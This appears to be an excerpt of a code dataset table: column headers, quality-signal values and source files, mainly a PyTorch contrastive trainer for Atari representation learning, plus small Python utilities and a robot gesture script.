hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2e0b218dfc08afab61e86f9a1155c024db47e196
| 24,108
|
py
|
Python
|
atariari/methods/stdim.py
|
JKLee0717/atari-representation-learning
|
cc4e8e221c1d896bd47706ce15e095b8a85debbb
|
[
"MIT"
] | null | null | null |
atariari/methods/stdim.py
|
JKLee0717/atari-representation-learning
|
cc4e8e221c1d896bd47706ce15e095b8a85debbb
|
[
"MIT"
] | null | null | null |
atariari/methods/stdim.py
|
JKLee0717/atari-representation-learning
|
cc4e8e221c1d896bd47706ce15e095b8a85debbb
|
[
"MIT"
] | null | null | null |
import random
import torch
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from torch.utils.data import RandomSampler, BatchSampler
from .utils import calculate_accuracy, Cutout
from .trainer import Trainer
from .utils import EarlyStopping
from torchvision import transforms
import torchvision.transforms.functional as TF
from atariari.benchmark.envs import make_vec_envs # action space 불러오기
from atariari.methods.utils import get_argparser # action space 불러오기
############ Action space #############
parser = get_argparser()
args = parser.parse_args()
env_action_space_size = make_vec_envs(args.env_name, args.seed, args.num_processes, args.num_frame_stack, not args.no_downsample, args.color).action_space.n
#######################################
class Classifier(nn.Module):
def __init__(self, num_inputs1, num_inputs2):
super().__init__()
self.network = nn.Bilinear(num_inputs1, num_inputs2, 1)
def forward(self, x1, x2):
return self.network(x1, x2)
class InfoNCESpatioTemporalTrainer(Trainer):
def __init__(self, encoder, config, device=torch.device('cpu'), wandb=None):
super().__init__(encoder, wandb, device)
self.config = config
self.patience = self.config["patience"]
self.classifier1 = nn.Linear(self.encoder.hidden_size, self.encoder.local_layer_depth).to(device) # x1 = global, x2=patch, n_channels = 32
self.classifier2 = nn.Linear(self.encoder.local_layer_depth, self.encoder.local_layer_depth).to(device)
self.classifier3 = nn.Linear(self.encoder.hidden_size * 2, env_action_space_size).to(device)
self.epochs = config['epochs']
self.batch_size = config['batch_size']
self.device = device
self.optimizer = torch.optim.Adam(list(self.classifier1.parameters()) + list(self.encoder.parameters()) + list(self.classifier3.parameters()) +
list(self.classifier2.parameters()),
lr=config['lr'], eps=1e-5)
self.early_stopper = EarlyStopping(patience=self.patience, verbose=False, wandb=self.wandb, name="encoder")
self.transform = transforms.Compose([Cutout(n_holes=1, length=80)])
def generate_batch(self, episodes, acts):
total_steps = sum([len(e) for e in episodes])
print('Total Steps: {}'.format(total_steps))
# Episode sampler
# Sample `num_samples` episodes then batchify them with `self.batch_size` episodes per batch
sampler = BatchSampler(RandomSampler(range(len(episodes)),
replacement=True, num_samples=total_steps),
self.batch_size, drop_last=True)
#print(len(acts[10]), len(episodes[10]), len(acts[20]), len(episodes[20]), len(acts[30]), len(episodes[30]), len(acts[40]), len(episodes[40]) )
for indices in sampler:
episodes_batch = [episodes[x] for x in indices]
acts_batch = [acts[x] for x in indices]
#print(len(acts_batch[0]), len(episodes_batch[0]))
x_t, x_tprev, x_that, ts, thats, act_tprev = [], [], [], [], [], []
for i, episode in enumerate(episodes_batch):
act = acts_batch[i]
# Get one sample from this episode
t, t_hat = 0, 0
t, t_hat = np.random.randint(0, len(episode)), np.random.randint(0, len(episode))
#print(len(episode), len(act))
x_t.append(episode[t])
x_tprev.append(episode[t - 1])
act_tprev.append(act[t])
ts.append([t])
yield torch.stack(x_t).float().to(self.device) / 255., torch.stack(x_tprev).float().to(self.device) / 255. , torch.stack(act_tprev).float().to(self.device)
def do_one_epoch(self, epoch, episodes, acts):
mode = "train" if self.encoder.training and self.classifier1.training else "val"
epoch_loss, accuracy, steps = 0., 0., 0
accuracy1, accuracy2 = 0., 0.
epoch_loss1, epoch_loss2 = 0., 0.
data_generator = self.generate_batch(episodes, acts)
for x_t, x_tprev, act_tprev in data_generator:
f_t_maps, f_t_prev_maps = self.encoder(x_t, fmaps=True), self.encoder(x_tprev, fmaps=True)
# Loss 1: Global at time t, f5 patches at time t-1
f_t, f_t_prev = f_t_maps['out'], f_t_prev_maps['f5']
sy = f_t_prev.size(1)
sx = f_t_prev.size(2)
N = f_t.size(0)
loss1 = 0.
for y in range(sy):
for x in range(sx):
predictions = self.classifier1(f_t)
positive = f_t_prev[:, y, x, :]
logits = torch.matmul(predictions, positive.t())
step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
loss1 += step_loss
loss1 = loss1 / (sx * sy)
# Loss 2: f5 patches at time t, with f5 patches at time t-1
f_t = f_t_maps['f5']
loss2 = 0.
for y in range(sy):
for x in range(sx):
predictions = self.classifier2(f_t[:, y, x, :])
positive = f_t_prev[:, y, x, :]
logits = torch.matmul(predictions, positive.t())
step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
loss2 += step_loss
loss2 = loss2 / (sx * sy)
######## Loss 3: ABST-DIM AFC ##########
f_t_out, f_t_prev_out = f_t_maps['out'], f_t_prev_maps['out']
x = torch.cat([f_t_out, f_t_prev_out], dim=1)
net_out = self.classifier3(x)
act_tprev=act_tprev.to(torch.long)
#print(act_tprev)
actions_one_hot = torch.squeeze(F.one_hot(act_tprev, env_action_space_size)).float()
#print(net_out, actions_one_hot)
loss3 = nn.MSELoss()(net_out, actions_one_hot)
#print(loss1, loss2, loss3)
loss = loss1 + loss2 + loss3
##############################################
if mode == "train":
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
epoch_loss += loss.detach().item()
epoch_loss1 += loss1.detach().item()
epoch_loss2 += loss2.detach().item()
steps += 1
self.log_results(epoch, epoch_loss1 / steps, epoch_loss2 / steps, epoch_loss / steps, prefix=mode)
if mode == "val":
self.early_stopper(-epoch_loss / steps, self.encoder)
def train(self, tr_eps, val_eps, tr_acts, val_acts):
# TODO: Make it work for all modes, right now only it defaults to pcl.
for e in range(self.epochs):
self.encoder.train(), self.classifier1.train(), self.classifier2.train(), self.classifier3.train()
self.do_one_epoch(e, tr_eps, tr_acts)
self.encoder.eval(), self.classifier1.eval(), self.classifier2.eval(), self.classifier3.eval()
self.do_one_epoch(e, val_eps, val_acts)
if self.early_stopper.early_stop:
break
torch.save(self.encoder.state_dict(), os.path.join(self.wandb.run.dir, self.config['env_name'] + '.pt'))
def log_results(self, epoch_idx, epoch_loss1, epoch_loss2, epoch_loss, prefix=""):
print("{} Epoch: {}, Epoch Loss: {}, {}".format(prefix.capitalize(), epoch_idx, epoch_loss,
prefix.capitalize()))
self.wandb.log({prefix + '_loss': epoch_loss,
prefix + '_loss1': epoch_loss1,
prefix + '_loss2': epoch_loss2}, step=epoch_idx, commit=False)
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
class Region_Sensitive_Module(nn.Module): #추가
def __init__(self, num_inputs):
super().__init__()
self.conv1_attent = nn.Conv2d(num_inputs, 512, 1)
self.conv2_attent = nn.Conv2d(512, 2, 1)
def forward(self, inputs):
weights = F.elu(self.conv1_attent(inputs))
weights = self.conv2_attent(weights) # (batch, 2, 7, 7)
weights = torch.sigmoid(weights)
return weights
class Action_Classifier(nn.Module):
def __init__(self, encoder):
super().__init__()
self.final_conv_size = 64 * 9 * 6
self.tail = nn.Sequential(
nn.ReLU(),
Flatten(),
nn.Linear(self.final_conv_size, 256),
)
self.linear2 = nn.Linear(256*2, env_action_space_size)
def forward(self, x1, x2):
x1 = self.tail(x1) # 256
x2 = self.tail(x2)
x = torch.cat([x1, x2], dim=1) # (64, 512)
out = self.linear2(x)
return out
class InfoNCESpatioTemporalTrainer_ARSM(Trainer):
def __init__(self, encoder, config, device=torch.device('cpu'), wandb=None):
super().__init__(encoder, wandb, device)
self.config = config
self.patience = self.config["patience"]
self.classifier1 = nn.Linear(self.encoder.hidden_size, self.encoder.local_layer_depth).to(device) # x1 = global, x2=patch, n_channels = 32
self.classifier2 = nn.Linear(self.encoder.local_layer_depth, self.encoder.local_layer_depth).to(device)
self.classifier3 = Action_Classifier(encoder).to(device)
self.Region_Sensitive_Module = Region_Sensitive_Module(num_inputs = 64).to(device)
self._lambda = 0.5
self.epochs = config['epochs']
self.batch_size = config['batch_size']
self.device = device
self.optimizer = torch.optim.Adam(list(self.classifier1.parameters()) + list(self.encoder.parameters()) +
list(self.classifier2.parameters()) +
list(self.classifier3.parameters()) + list(self.Region_Sensitive_Module.parameters()) # 추가
, lr=config['lr'], eps=1e-5)
self.early_stopper = EarlyStopping(patience=self.patience, verbose=False, wandb=self.wandb, name="encoder")
self.transform = transforms.Compose([Cutout(n_holes=1, length=80)])
def generate_batch(self, episodes, acts):
total_steps = sum([len(e) for e in episodes])
print('Total Steps: {}'.format(total_steps))
# Episode sampler
# Sample `num_samples` episodes then batchify them with `self.batch_size` episodes per batch
sampler = BatchSampler(RandomSampler(range(len(episodes)),
replacement=True, num_samples=total_steps),
self.batch_size, drop_last=True)
#print(len(acts[10]), len(episodes[10]), len(acts[20]), len(episodes[20]), len(acts[30]), len(episodes[30]), len(acts[40]), len(episodes[40]) )
for indices in sampler:
episodes_batch = [episodes[x] for x in indices]
acts_batch = [acts[x] for x in indices]
#print(len(acts_batch[0]), len(episodes_batch[0]))
x_t, x_tprev, x_that, ts, thats, act_tprev = [], [], [], [], [], []
for i, episode in enumerate(episodes_batch):
act = acts_batch[i]
# Get one sample from this episode
t, t_hat = 0, 0
t, t_hat = np.random.randint(0, len(episode)), np.random.randint(0, len(episode))
#print(len(episode), len(act))
x_t.append(episode[t])
x_tprev.append(episode[t - 1])
act_tprev.append(act[t])
ts.append([t])
yield torch.stack(x_t).float().to(self.device) / 255., torch.stack(x_tprev).float().to(self.device) / 255. , torch.stack(act_tprev).float().to(self.device)
def do_one_epoch(self, epoch, episodes, acts):
mode = "train" if self.encoder.training and self.classifier1.training else "val"
epoch_loss, accuracy, steps = 0., 0., 0
accuracy1, accuracy2 = 0., 0.
epoch_loss1, epoch_loss2 = 0., 0.
data_generator = self.generate_batch(episodes, acts)
for x_t, x_tprev, act_tprev in data_generator:
f_t_maps, f_t_prev_maps = self.encoder(x_t, fmaps=True), self.encoder(x_tprev, fmaps=True)
# Loss 1: Global at time t, f5 patches at time t-1
f_t, f_t_prev = f_t_maps['out'], f_t_prev_maps['f5']
sy = f_t_prev.size(1)
sx = f_t_prev.size(2)
N = f_t.size(0)
loss1 = 0.
for y in range(sy):
for x in range(sx):
predictions = self.classifier1(f_t)
positive = f_t_prev[:, y, x, :]
logits = torch.matmul(predictions, positive.t())
step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
loss1 += step_loss
loss1 = loss1 / (sx * sy)
# Loss 2: f5 patches at time t, with f5 patches at time t-1
f_t = f_t_maps['f5']
loss2 = 0.
for y in range(sy):
for x in range(sx):
predictions = self.classifier2(f_t[:, y, x, :])
positive = f_t_prev[:, y, x, :]
logits = torch.matmul(predictions, positive.t())
step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
loss2 += step_loss
loss2 = loss2 / (sx * sy)
######## Loss 3: ABST-DIM ARSM ##########
f_t_out, f_t_prev_out = f_t_maps['f7'].permute(0,3,1,2), f_t_prev_maps['f7'].permute(0,3,1,2) #
#print(f_t_out.shape, f_t_prev_out.shape)
f_t_RS_weight, f_t_prev_RS_weight = self.Region_Sensitive_Module(f_t_out), self.Region_Sensitive_Module(f_t_prev_out)
#Broadcasting
f_t_out1 = f_t_out * f_t_RS_weight[:, :1, :, :]
f_t_out2 = f_t_out * f_t_RS_weight[:, 1:, :, :]
f_t_out = f_t_out1 + f_t_out2
f_t_prev_out1 = f_t_prev_out * f_t_prev_RS_weight[:, :1, :, :]
f_t_prev_out2 = f_t_prev_out * f_t_prev_RS_weight[:, 1:, :, :]
f_t_prev_out = f_t_prev_out1 + f_t_prev_out2
# Action Prediction
net_out = self.classifier3(f_t_out, f_t_prev_out)
act_tprev=act_tprev.to(torch.long)
#print(act_tprev)
actions_one_hot = torch.squeeze(F.one_hot(act_tprev, env_action_space_size)).float()
#print(net_out, actions_one_hot)
loss3 = nn.MSELoss()(net_out, actions_one_hot)
#print(loss1, loss2, loss3)
loss = loss1 + loss2 + loss3
##############################################
if mode == "train":
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
epoch_loss += loss.detach().item()
epoch_loss1 += loss1.detach().item()
epoch_loss2 += loss2.detach().item()
steps += 1
self.log_results(epoch, epoch_loss1 / steps, epoch_loss2 / steps, epoch_loss / steps, prefix=mode)
if mode == "val":
self.early_stopper(-epoch_loss / steps, self.encoder)
def train(self, tr_eps, val_eps, tr_acts, val_acts):
# TODO: Make it work for all modes, right now only it defaults to pcl.
for e in range(self.epochs):
self.encoder.train(), self.classifier1.train(), self.classifier2.train(), self.classifier3.train(), self.Region_Sensitive_Module.train()
self.do_one_epoch(e, tr_eps, tr_acts)
self.encoder.eval(), self.classifier1.eval(), self.classifier2.eval(), self.classifier3.eval(), self.Region_Sensitive_Module.eval()
self.do_one_epoch(e, val_eps, val_acts)
if self.early_stopper.early_stop:
break
torch.save(self.encoder.state_dict(), os.path.join(self.wandb.run.dir, self.config['env_name'] + '.pt'))
def log_results(self, epoch_idx, epoch_loss1, epoch_loss2, epoch_loss, prefix=""):
print("{} Epoch: {}, Epoch Loss: {}, {}".format(prefix.capitalize(), epoch_idx, epoch_loss,
prefix.capitalize()))
self.wandb.log({prefix + '_loss': epoch_loss,
prefix + '_loss1': epoch_loss1,
prefix + '_loss2': epoch_loss2}, step=epoch_idx, commit=False)
class InfoNCESpatioTemporalTrainer_AMM(Trainer):
def __init__(self, encoder, config, device=torch.device('cpu'), wandb=None):
super().__init__(encoder, wandb, device)
self.config = config
self.patience = self.config["patience"]
self.classifier1 = nn.Linear(self.encoder.hidden_size, self.encoder.local_layer_depth).to(device) # x1 = global, x2=patch, n_channels = 32
self.classifier2 = nn.Linear(self.encoder.local_layer_depth, self.encoder.local_layer_depth).to(device)
self.classifier3 = nn.Linear(256*2, env_action_space_size).to(device)
self._lambda = 0.5
self.epochs = config['epochs']
self.batch_size = config['batch_size']
self.device = device
self.optimizer = torch.optim.Adam(list(self.classifier1.parameters()) + list(self.encoder.parameters()) +
list(self.classifier2.parameters()) +
list(self.classifier3.parameters())
, lr=config['lr'], eps=1e-5)
self.early_stopper = EarlyStopping(patience=self.patience, verbose=False, wandb=self.wandb, name="encoder")
self.transform = transforms.Compose([Cutout(n_holes=1, length=80)])
def generate_batch(self, episodes, acts):
total_steps = sum([len(e) for e in episodes])
print('Total Steps: {}'.format(total_steps))
# Episode sampler
# Sample `num_samples` episodes then batchify them with `self.batch_size` episodes per batch
sampler = BatchSampler(RandomSampler(range(len(episodes)),
replacement=True, num_samples=total_steps),
self.batch_size, drop_last=True)
#print(len(acts[10]), len(episodes[10]), len(acts[20]), len(episodes[20]), len(acts[30]), len(episodes[30]), len(acts[40]), len(episodes[40]) )
for indices in sampler:
episodes_batch = [episodes[x] for x in indices]
acts_batch = [acts[x] for x in indices]
#print(len(acts_batch[0]), len(episodes_batch[0]))
x_t, x_tprev, x_that, ts, thats, act_tprev = [], [], [], [], [], []
for i, episode in enumerate(episodes_batch):
act = acts_batch[i]
# Get one sample from this episode
t, t_hat = 0, 0
t, t_hat = np.random.randint(0, len(episode)), np.random.randint(0, len(episode))
#print(len(episode), len(act))
x_t.append(episode[t])
x_tprev.append(episode[t - 1])
act_tprev.append(act[t])
ts.append([t])
yield torch.stack(x_t).float().to(self.device) / 255., torch.stack(x_tprev).float().to(self.device) / 255. , torch.stack(act_tprev).float().to(self.device)
def do_one_epoch(self, epoch, episodes, acts):
mode = "train" if self.encoder.training and self.classifier1.training else "val"
epoch_loss, accuracy, steps = 0., 0., 0
accuracy1, accuracy2 = 0., 0.
epoch_loss1, epoch_loss2 = 0., 0.
data_generator = self.generate_batch(episodes, acts)
for x_t, x_tprev, act_tprev in data_generator:
f_t_maps, f_t_prev_maps = self.encoder(x_t, fmaps=True), self.encoder(x_tprev, fmaps=True)
# Loss 1: Global at time t, f5 patches at time t-1
f_t, f_t_prev = f_t_maps['out'], f_t_prev_maps['f5']
sy = f_t_prev.size(1)
sx = f_t_prev.size(2)
N = f_t.size(0)
loss1 = 0.
for y in range(sy):
for x in range(sx):
predictions = self.classifier1(f_t)
positive = f_t_prev[:, y, x, :]
logits = torch.matmul(predictions, positive.t())
step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
loss1 += step_loss
loss1 = loss1 / (sx * sy)
# Loss 2: f5 patches at time t, with f5 patches at time t-1
f_t = f_t_maps['f5']
loss2 = 0.
for y in range(sy):
for x in range(sx):
predictions = self.classifier2(f_t[:, y, x, :])
positive = f_t_prev[:, y, x, :]
logits = torch.matmul(predictions, positive.t())
step_loss = F.cross_entropy(logits, torch.arange(N).to(self.device))
loss2 += step_loss
loss2 = loss2 / (sx * sy)
######## Loss 3: ABST-DIM AMM ##########
f_t_out, f_t_prev_out = f_t_maps['out'], f_t_prev_maps['out'] #.permute(0,3,1,2)
#print(f_t_out.shape, f_t_prev_out.shape)
x = torch.cat([f_t_out, f_t_prev_out], dim=1)
# Action Prediction
net_out = self.classifier3(x)
act_tprev=act_tprev.to(torch.long)
#print(act_tprev)
actions_one_hot = torch.squeeze(F.one_hot(act_tprev, env_action_space_size)).float()
#print(net_out, actions_one_hot)
loss3 = nn.MSELoss()(net_out, actions_one_hot)
#print(loss1, loss2, loss3)
#loss = (1-self._lambda)*(loss1 + loss2) + self._lambda*loss3
loss = loss1 + loss2 + loss3
##############################################
if mode == "train":
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
epoch_loss += loss.detach().item()
epoch_loss1 += loss1.detach().item()
epoch_loss2 += loss2.detach().item()
#preds1 = torch.sigmoid(self.classifier1(x1, x2).squeeze())
#accuracy1 += calculate_accuracy(preds1, target)
#preds2 = torch.sigmoid(self.classifier2(x1_p, x2_p).squeeze())
#accuracy2 += calculate_accuracy(preds2, target)
steps += 1
self.log_results(epoch, epoch_loss1 / steps, epoch_loss2 / steps, epoch_loss / steps, prefix=mode)
if mode == "val":
self.early_stopper(-epoch_loss / steps, self.encoder)
def train(self, tr_eps, val_eps, tr_acts, val_acts):
# TODO: Make it work for all modes, right now only it defaults to pcl.
for e in range(self.epochs):
self.encoder.train(), self.classifier1.train(), self.classifier2.train(), self.classifier3.train()
self.do_one_epoch(e, tr_eps, tr_acts)
self.encoder.eval(), self.classifier1.eval(), self.classifier2.eval(), self.classifier3.eval()
self.do_one_epoch(e, val_eps, val_acts)
if self.early_stopper.early_stop:
break
torch.save(self.encoder.state_dict(), os.path.join(self.wandb.run.dir, self.config['env_name'] + '.pt'))
def log_results(self, epoch_idx, epoch_loss1, epoch_loss2, epoch_loss, prefix=""):
print("{} Epoch: {}, Epoch Loss: {}, {}".format(prefix.capitalize(), epoch_idx, epoch_loss,
prefix.capitalize()))
self.wandb.log({prefix + '_loss': epoch_loss,
prefix + '_loss1': epoch_loss1,
prefix + '_loss2': epoch_loss2}, step=epoch_idx, commit=False)
| 49.707216
| 167
| 0.570806
| 3,088
| 24,108
| 4.242552
| 0.089702
| 0.013587
| 0.019693
| 0.009618
| 0.869781
| 0.863217
| 0.849019
| 0.841462
| 0.835432
| 0.835432
| 0
| 0.025813
| 0.296167
| 24,108
| 484
| 168
| 49.809917
| 0.746287
| 0.104364
| 0
| 0.808864
| 0
| 0
| 0.019647
| 0
| 0
| 0
| 0
| 0.002066
| 0
| 1
| 0.060942
| false
| 0
| 0.041551
| 0.00554
| 0.132964
| 0.016621
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2e43f0834a5acd142a51781fd6edb741b90d526a
| 85
|
py
|
Python
|
src/ewaluacja2021/tests/utils.py
|
iplweb/django-bpp
|
85f183a99d8d5027ae4772efac1e4a9f21675849
|
[
"BSD-3-Clause"
] | 1
|
2017-04-27T19:50:02.000Z
|
2017-04-27T19:50:02.000Z
|
src/ewaluacja2021/tests/utils.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | null | null | null |
src/ewaluacja2021/tests/utils.py
|
mpasternak/django-bpp
|
434338821d5ad1aaee598f6327151aba0af66f5e
|
[
"BSD-3-Clause"
] | null | null | null |
import os
def curdir(fn, name):
return os.path.join(os.path.dirname(name), fn)
| 14.166667
| 50
| 0.682353
| 15
| 85
| 3.866667
| 0.666667
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164706
| 85
| 5
| 51
| 17
| 0.816901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
2e4c24f1e5fc3f96f33d7d3d6fb7f108be654055
| 181
|
py
|
Python
|
cmft/__init__.py
|
dryobates/commit-message-from-test
|
41b4aa022f9432e6447e297b928d694835dc6495
|
[
"MIT"
] | null | null | null |
cmft/__init__.py
|
dryobates/commit-message-from-test
|
41b4aa022f9432e6447e297b928d694835dc6495
|
[
"MIT"
] | 5
|
2019-09-27T19:52:50.000Z
|
2019-09-30T20:03:49.000Z
|
cmft/__init__.py
|
dryobates/commit-message-from-test
|
41b4aa022f9432e6447e297b928d694835dc6495
|
[
"MIT"
] | null | null | null |
from cmft.extract_from_python import extract_messages_from_python_file_diff
from cmft.extract_message import KNOWN_FILES
KNOWN_FILES["py"] = extract_messages_from_python_file_diff
| 36.2
| 75
| 0.895028
| 28
| 181
| 5.25
| 0.428571
| 0.204082
| 0.204082
| 0.340136
| 0.44898
| 0.44898
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066298
| 181
| 4
| 76
| 45.25
| 0.869822
| 0
| 0
| 0
| 0
| 0
| 0.01105
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
cf0be9e148435bef347f7e16e36a1324579c180c
| 136
|
py
|
Python
|
home/hairygael/GESTURES/startkinect.py
|
rv8flyboy/pyrobotlab
|
4e04fb751614a5cb6044ea15dcfcf885db8be65a
|
[
"Apache-2.0"
] | 63
|
2015-02-03T18:49:43.000Z
|
2022-03-29T03:52:24.000Z
|
home/hairygael/GESTURES/startkinect.py
|
hirwaHenryChristian/pyrobotlab
|
2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9
|
[
"Apache-2.0"
] | 16
|
2016-01-26T19:13:29.000Z
|
2018-11-25T21:20:51.000Z
|
home/hairygael/GESTURES/startkinect.py
|
hirwaHenryChristian/pyrobotlab
|
2debb381fc2db4be1e7ea6e5252a50ae0de6f4a9
|
[
"Apache-2.0"
] | 151
|
2015-01-03T18:55:54.000Z
|
2022-03-04T07:04:23.000Z
|
def startkinect():
i01.leftArm.shoulder.map(0,180,-25,105)
i01.rightArm.shoulder.map(0,180,-30,100)
i01.copyGesture(True)
| 19.428571
| 44
| 0.683824
| 21
| 136
| 4.428571
| 0.714286
| 0.236559
| 0.258065
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 0.139706
| 136
| 6
| 45
| 22.666667
| 0.589744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cf438c1e6df5f904cdd702ca895623cd9d231d8e
| 11,664
|
py
|
Python
|
app/flaskapp/mrz_parser.py
|
Sagargajare/flask-docker-final
|
115cf02b7f1ae4fafdfa50a6ce09749a30c2f84a
|
[
"MIT"
] | null | null | null |
app/flaskapp/mrz_parser.py
|
Sagargajare/flask-docker-final
|
